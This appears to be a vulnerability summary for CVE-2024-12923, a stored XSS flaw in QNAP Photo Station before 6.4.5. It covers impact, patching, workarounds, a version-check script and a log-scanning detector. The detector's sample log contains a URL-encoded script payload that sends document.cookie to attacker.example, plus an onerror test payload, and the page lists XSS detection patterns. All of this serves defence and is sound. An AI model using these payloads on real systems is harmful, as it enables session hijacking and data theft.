CVE-2024-12923

5.4 MEDIUM

📋 TL;DR

A stored cross-site scripting (XSS) vulnerability in QNAP Photo Station lets an authenticated user inject script into content that Photo Station later renders for other users; the script then runs in those users' browsers with their Photo Station session. All Photo Station versions before 6.4.5 on QTS and QuTS hero are affected. Exploitation requires a valid account on the NAS, so the realistic risk is a low-privileged or shared account reaching the session of an administrator who views the tainted content.

💻 Affected Systems

Products:
  • QNAP Photo Station
Versions: All versions before 6.4.5
Operating Systems: QTS, QuTS hero
Default Config Vulnerable: ⚠️ Yes
Notes: Requires attacker to have a valid user account; Photo Station must be enabled and accessible.

📦 What is this software?

QNAP Photo Station is the photo and album management application for QNAP NAS devices running QTS and QuTS hero. It is installed from App Center, is served by the NAS's built-in web server, and lets NAS users organise, annotate and share albums with other accounts through a browser, so user-supplied text (album names, descriptions and similar fields) is rendered to other users. That rendering of one user's input to another is where a stored XSS bug matters.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A low-privileged or shared account plants script in content that an administrator later opens. Because the script runs in the administrator's browser within the Photo Station origin, it can call the application's web API with the administrator's session (cookie theft is not required, so an HttpOnly flag on the session cookie does not stop this), change sharing settings, read or exfiltrate private photos and account data, and redirect the victim to an attacker-controlled site.

🟠

Likely Case

An attacker holding an ordinary user account defaces shared albums, hijacks the sessions of other users who view the tainted content, or redirects them to phishing or malware-hosting sites.

🟢

If Mitigated

Contextual output encoding of user-supplied text (plus a whitelist HTML sanitiser for any field that must accept formatting) removes the vulnerability at the source. A Content Security Policy that disallows inline script limits what an injected payload can do, and keeping Photo Station reachable only from a trusted network (never exposing the NAS web UI to the internet) limits who can reach a vulnerable instance in the first place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access; specific injection vectors not disclosed in advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Photo Station 6.4.5 (2025/01/02) and later

Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-25-24

Restart Required: Yes

Instructions:

1. Log into QTS or QuTS hero as an administrator and open App Center.
2. Locate Photo Station and check for an available update.
3. Install Photo Station 6.4.5 or later.
4. Restart Photo Station (or the NAS) and confirm that App Center now shows 6.4.5 or later.

🔧 Temporary Workarounds

Disable Photo Station
Applies to: all
Temporarily disable Photo Station if it is not needed.
Log into QTS/QuTS hero > App Center > Photo Station > Disable. Stored content stays on disk, so this does not remove an already-planted payload; it only stops it from being served until the app is re-enabled on a patched version.

Restrict Network Access
Applies to: all
Limit Photo Station access to trusted networks only.
Configure firewall rules (QNAP's QuFirewall app, or an upstream firewall) so that the NAS web ports are reachable only from trusted networks. Photo Station is served through the QTS web server on the system HTTP/HTTPS ports, so port-based rules also restrict the QTS management UI; neither should be exposed to the internet.

🧯 If You Can't Patch

  • Photo Station is a vendor-packaged application, so its input handling and output encoding cannot be changed on the NAS itself. Input validation at the web application layer is only possible if the NAS sits behind a reverse proxy or WAF you control, and filtering at that layer is a stopgap that is easy to bypass (encoding variants, payloads in POST bodies the filter does not inspect).
  • A Content Security Policy header that disallows inline script, again added by a reverse proxy in front of the NAS, limits what a stored payload can do but does not remove the injection.
  • Reduce the attacker's prerequisite: exploitation needs a valid login, so remove stale and shared accounts, limit which accounts can use Photo Station, and enforce strong passwords and QTS 2-step verification.

🔍 How to Verify

Check if Vulnerable:

Check the Photo Station version in App Center; any version below 6.4.5 (for example 6.4.4 or 6.3.x) is vulnerable. Compare versions numerically, component by component, not as strings: a hypothetical 6.4.10 is newer than 6.4.5 even though it sorts before it alphabetically.

Check Version:

Log into QTS/QuTS hero > App Center > Photo Station and read the version shown.

Verify Fix Applied:

Confirm that Photo Station reports 6.4.5 or later in App Center. If you also want to test the behaviour yourself, do so only on a NAS you own, with a harmless payload in a text field that other users can see (for example an album description containing <script>alert(1)</script>), and confirm that the field is displayed literally rather than executed.
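The following is an added example, not QNAP's tooling or code from the advisory. It checks a Photo Station version string against the 6.4.5 fix threshold with a numeric, component-wise comparison (avoiding the string-comparison pitfall described above), and reads the version out of a constructed excerpt in the style of QTS's /etc/config/qpkg.conf. The section name "PhotoStation" and the "Version =" field layout of that file are assumptions.

```python
import re

# First fixed release named in the vendor advisory (QSA-25-24).
FIXED_VERSION = (6, 4, 5)

# Constructed excerpt in the style of /etc/config/qpkg.conf on QTS.
# Section name and field names are assumptions, not verified against a NAS.
SAMPLE_QPKG_CONF = """\
[PhotoStation]
Name = PhotoStation
Version = 6.4.3
Enable = TRUE
[MultimediaConsole]
Name = MultimediaConsole
Version = 2.5.0
Enable = TRUE
"""


def parse_version(s):
    """Turn '6.4.5' (optionally 'v6.4.5' or '6.4.5.20250102') into a tuple
    of ints. Trailing numeric build components are kept; anything after the
    numeric part is ignored."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", s)
    if not m:
        raise ValueError(f"unparseable version: {s!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable(version):
    """True if the Photo Station version is below 6.4.5.
    Tuple comparison is component-wise, so (6, 4, 10) > (6, 4, 5), whereas
    the strings '6.4.10' < '6.4.5' would give the wrong answer."""
    return parse_version(version) < FIXED_VERSION


def qpkg_versions(conf_text):
    """Parse a qpkg.conf-style INI text into {section_name: version_string}."""
    versions, section = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section and line.lower().startswith("version") and "=" in line:
            versions[section] = line.split("=", 1)[1].strip()
    return versions


def check_photo_station(conf_text, section="PhotoStation"):
    """Report whether Photo Station is installed and, if so, whether the
    installed version is below the fixed release."""
    version = qpkg_versions(conf_text).get(section)
    if version is None:
        return {"installed": False, "version": None, "vulnerable": False}
    return {"installed": True, "version": version,
            "vulnerable": is_vulnerable(version)}


if __name__ == "__main__":
    print(check_photo_station(SAMPLE_QPKG_CONF))
```

On a real NAS you would feed the function the contents of the actual qpkg.conf (or the version string copied from App Center) instead of the constructed excerpt.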

📡 Detection & Monitoring

Log Indicators:

  • HTML or script markup (<script, onerror=, javascript:, including URL-encoded forms such as %3Cscript) in Photo Station request parameters or in stored field values such as album titles and descriptions
  • A burst of failed logins followed by a success: the attacker needs a valid account, so credential stuffing or password spraying against the NAS login typically precedes exploitation

Network Indicators:

  • Browsers of Photo Station users connecting to unfamiliar external hosts shortly after loading Photo Station pages (a payload exfiltrating data or fetching a second-stage script); the NAS itself makes no outbound connection, because the injected script runs in the victim's browser
  • XSS-like payloads in HTTP requests to the NAS web ports

SIEM Query:

source="photo_station_logs" AND ("<script" OR "%3Cscript" OR "javascript:" OR "onerror=" OR "onload=")

The bare words "script", "javascript", "onerror" and "onload" match legitimate traffic (asset names ending in .js, search terms, ordinary page loads); anchoring on the angle bracket, the "=" and the ":" removes most of that noise. A stored payload submitted in a POST body will not appear in an access log that records only the request line, so an empty result does not mean no exploitation.
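An added example of the detection logic above run over constructed access-log lines; it is not part of the advisory and not QNAP's code. It parses Combined Log Format, URL-decodes query strings repeatedly (double encoding is a common filter bypass), and matches only markup-shaped patterns, so the search term "javascript" and a file named description.js are not flagged while encoded <script> and onerror= payloads are. The log lines, IP addresses, user names and the /photo/ request paths are constructed for the example and are not real Photo Station endpoints.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Combined Log Format). Paths, users and
# addresses are illustrative only; they are not real Photo Station endpoints.
SAMPLE_LOG = """\
192.0.2.10 - alice [02/Jan/2025:10:00:01 +0000] "GET /photo/p/api/album.php?a=list HTTP/1.1" 200 512
192.0.2.10 - alice [02/Jan/2025:10:00:05 +0000] "GET /photo/js/description.js HTTP/1.1" 200 3344
198.51.100.7 - bob [02/Jan/2025:10:01:12 +0000] "POST /photo/p/api/album.php?a=setDesc&desc=%3Cscript%3Enew%20Image().src%3D%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 20
198.51.100.7 - bob [02/Jan/2025:10:02:40 +0000] "POST /photo/p/api/album.php?a=setTitle&title=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 20
203.0.113.5 - carol [02/Jan/2025:10:03:00 +0000] "GET /photo/p/api/search.php?q=javascript HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Markup-shaped patterns: each needs an angle bracket, an event-handler
# attribute with "=", or the "javascript:" scheme, so a bare word such as
# "script" or "javascript" in ordinary traffic does not match.
XSS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("embedding-tag", re.compile(r"<\s*(iframe|svg|object|embed|math)\b", re.I)),
    ("srcdoc", re.compile(r"\bsrcdoc\s*=", re.I)),
]


def fully_decode(s, max_rounds=3):
    """URL-decode until the string stops changing (bounded), so that a
    double-encoded payload such as %253Cscript is still seen as <script."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(text, path_prefix="/photo/"):
    """Return one finding per request under path_prefix whose query string
    carries an XSS-shaped payload. Only the request line is available in an
    access log, so payloads sent in a POST body are invisible here."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if not target.startswith(path_prefix) or "?" not in target:
            continue
        path, query = target.split("?", 1)
        decoded = fully_decode(query)
        hits = [name for name, rx in XSS_PATTERNS if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "user": m.group("user"),
                "method": m.group("method"),
                "path": path,
                "patterns": hits,
                "decoded_query": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['user']} {f['method']} {f['path']} -> {f['patterns']}")
```

Run against real logs, point the function at the access log of whatever web server or reverse proxy fronts the NAS, and treat any hit from an authenticated account as a prompt to inspect that account's stored album titles and descriptions, since the stored payload, not the request, is what later victims load.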

🔗 References

  • QNAP Security Advisory QSA-25-24: https://www.qnap.com/en/security-advisory/qsa-25-24